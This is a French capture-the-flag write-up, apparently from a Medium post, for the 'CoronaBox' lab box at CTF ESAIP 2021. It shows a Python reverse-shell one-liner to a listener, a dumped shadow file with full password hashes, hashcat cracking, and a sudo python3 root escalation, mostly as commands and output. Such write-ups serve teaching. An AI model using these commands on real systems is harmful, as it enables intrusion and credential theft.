CTF ESAIP 2021 — Box Write-up : CoronaBox

CTF ESAIP 2021
Scoreboard

CoronaBox

Challenge de type HackTheBox. Le but est de retrouver le flag situé dans /root/.

La box est accessible à l’adresse http://192.168.99.100:8088/.

Le flag est au format CTF{…..}.

L’application web Corovid
Exemple d’une requête effectuée pour rafraîchir le nombre affiché
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.255.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Utilisation de CyberChef pour l’encodage
Utilisation de la console javascript du navigateur pour modifier la commande qui va être signée
Connection from 192.168.99.100:59360 
/bin/sh: 0: can't access tty; job control turned off
$ whoami
pfizer
python3 -c 'import pty; pty.spawn("/bin/sh")'
root:x:0:0:root:/root:/bin/bash
pfizer:x:1000:1000::/home/pfizer:/bin/sh astrazeneca:x:1001:1001::/home/astrazeneca:/bin/sh
$ ls -al /srv 
ls -al /srv
total 12
drwxr-xr-x 1 root root 4096 May 29 17:29 .
drwxr-xr-x 1 root root 4096 May 23 21:48 ..
-rw-r--r-- 1 root pfizer 577 May 29 17:29 .bckp_2021-05-23_21:01.zip
$ cp /srv/.bckp_2021-05-23_21:01.zip /tmp
cp /srv/.bckp_2021-05-23_21:01.zip /tmp
$ unzip .bckp_2021-05-23_21:01.zip
unzip .bckp_2021-05-23_21:01.zip
Archive: .bckp_2021-05-23_21:01.zip
inflating: etc/shadow
$ ls -al
ls -al
total 24
drwxrwxrwt 1 root root 4096 May 29 17:30 .
drwxr-xr-x 1 root root 4096 May 23 21:48 ..
-rw-r--r-- 1 pfizer pfizer 577 May 29 17:29 .bckp_2021-05-23_21:01.zip
-rw-r--r-- 1 root root 12 May 29 17:30 .corovid_value.txt
drwxrwxr-x 2 pfizer pfizer 4096 May 29 17:30 etc
$ ls -al etc
ls -al etc
total 16
drwxrwxr-x 2 pfizer pfizer 4096 May 29 17:30 .
drwxrwxrwt 1 root root 4096 May 29 17:31 ..
-rw-r----- 1 pfizer pfizer 877 May 23 21:01 shadow
$ cat etc/shadow
cat etc/shadow
root:$6$qKTqZ3FAFP0HINUH$iIQtzV/KeP5vC12qQamP4hJ0EIm9jFIT4fJy8pjtOitMaJHWb8vNoFJLbyI8ObKvRUwVx/qSYqr47wKV6tsct0:18770:0:99999:7:::
daemon:*:18733:0:99999:7:::
bin:*:18733:0:99999:7:::
sys:*:18733:0:99999:7:::
sync:*:18733:0:99999:7:::
games:*:18733:0:99999:7:::
man:*:18733:0:99999:7:::
lp:*:18733:0:99999:7:::
mail:*:18733:0:99999:7:::
news:*:18733:0:99999:7:::
uucp:*:18733:0:99999:7:::
proxy:*:18733:0:99999:7:::
www-data:*:18733:0:99999:7:::
backup:*:18733:0:99999:7:::
list:*:18733:0:99999:7:::
irc:*:18733:0:99999:7:::
gnats:*:18733:0:99999:7:::
nobody:*:18733:0:99999:7:::
_apt:*:18733:0:99999:7:::
pfizer:$6$VjeJbF1j0r5HZyuD$4W7rRIHjbMJmMnvpUeHp4nsJl1XzmNRTZH9iNssJOlHw617sytbqajqyj8f0IpItYebpIHWa0MoAOBdBfErpZ/:18770:0:99999:7:::
astrazeneca:$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.:18770:0:99999:7:::
pfizer:$6$VjeJbF1j0r5HZyuD$4W7rRIHjbMJmMnvpUeHp4nsJl1XzmNRTZH9iNssJOlHw617sytbqajqyj8f0IpItYebpIHWa0MoAOBdBfErpZ/
astrazeneca:$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.
root:$6$qKTqZ3FAFP0HINUH$iIQtzV/KeP5vC12qQamP4hJ0EIm9jFIT4fJy8pjtOitMaJHWb8vNoFJLbyI8ObKvRUwVx/qSYqr47wKV6tsct0
hashcat -m 1800 -a 0 ./hashes ./rockyou.txt -O
$6$4zZ92IsZJlH8WBNH$m2rFyDaihM7U.M4Lb1abZwt1i4dXRsM2IWE4TxPu4y1qRKxHunntwXgYrP4hlllhd7.yjK1LD58sWXEJpasNK.:monsauveur
$ su astrazeneca
su astrazeneca
Password: monsauveur
$ sudo -l
sudo -l
Matching Defaults entries for astrazeneca on 1a37df71d186:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User astrazeneca may run the following commands on 1a37df71d186:
(ALL : ALL) NOPASSWD: /usr/bin/python3
$ sudo python3 -c 'import os; os.system("/bin/sh")'
sudo python3 -c 'import os; os.system("/bin/sh")'
# whoami
whoami
root
# cat /root/flag.txt
cat /root/flag.txt
CTF{V@cc!nezVous@h@h}

--

--

French CTF team

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store